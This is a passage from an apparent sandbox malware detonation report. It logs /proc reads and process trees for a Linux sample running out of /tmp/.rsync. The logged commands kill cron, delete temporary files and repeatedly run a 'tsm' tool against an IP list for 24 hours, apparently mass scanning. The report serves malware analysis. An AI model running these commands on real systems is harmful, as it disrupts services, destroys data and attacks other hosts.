| File opened for reading | /proc/12/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/159/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/14/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/70/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/404/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/159/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/240/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/668/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/694/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/362/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/74/stat | /bin/ps | N/A |
| File opened for reading | /proc/700/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/159/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/68/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/ps | N/A |
| File opened for reading | /proc/722/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/733/status | /bin/ps | N/A |
| File opened for reading | /proc/3/stat | /bin/ps | N/A |
| File opened for reading | /proc/21/status | /bin/ps | N/A |
| File opened for reading | /proc/20/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/240/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/668/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/721/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/724/status | /bin/ps | N/A |
| File opened for reading | /proc/15/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/19/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/20/stat | /bin/ps | N/A |
| File opened for reading | /proc/69/status | /bin/ps | N/A |
| File opened for reading | /proc/718/status | /bin/ps | N/A |
| File opened for reading | /proc/1/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/21/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/681/status | /bin/ps | N/A |
| File opened for reading | /proc/726/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/166/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/336/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/336/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/17/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/695/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/12/stat | /bin/ps | N/A |
| File opened for reading | /proc/17/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/19/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/694/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/722/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/20/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/733/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/9/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/37/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/394/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/668/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/180/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/718/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/74/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/735/cmdline | /bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
Processes
/tmp/.rsync/a/stop
[/tmp/.rsync/a/stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/ps
[ps x]
/bin/grep
[grep -v grep]
/bin/grep
[grep cron]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:58
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
147s
Max time network
129s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
Processes
/tmp/.rsync/c/go
[/tmp/.rsync/c/go]
/bin/uname
[uname -m]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
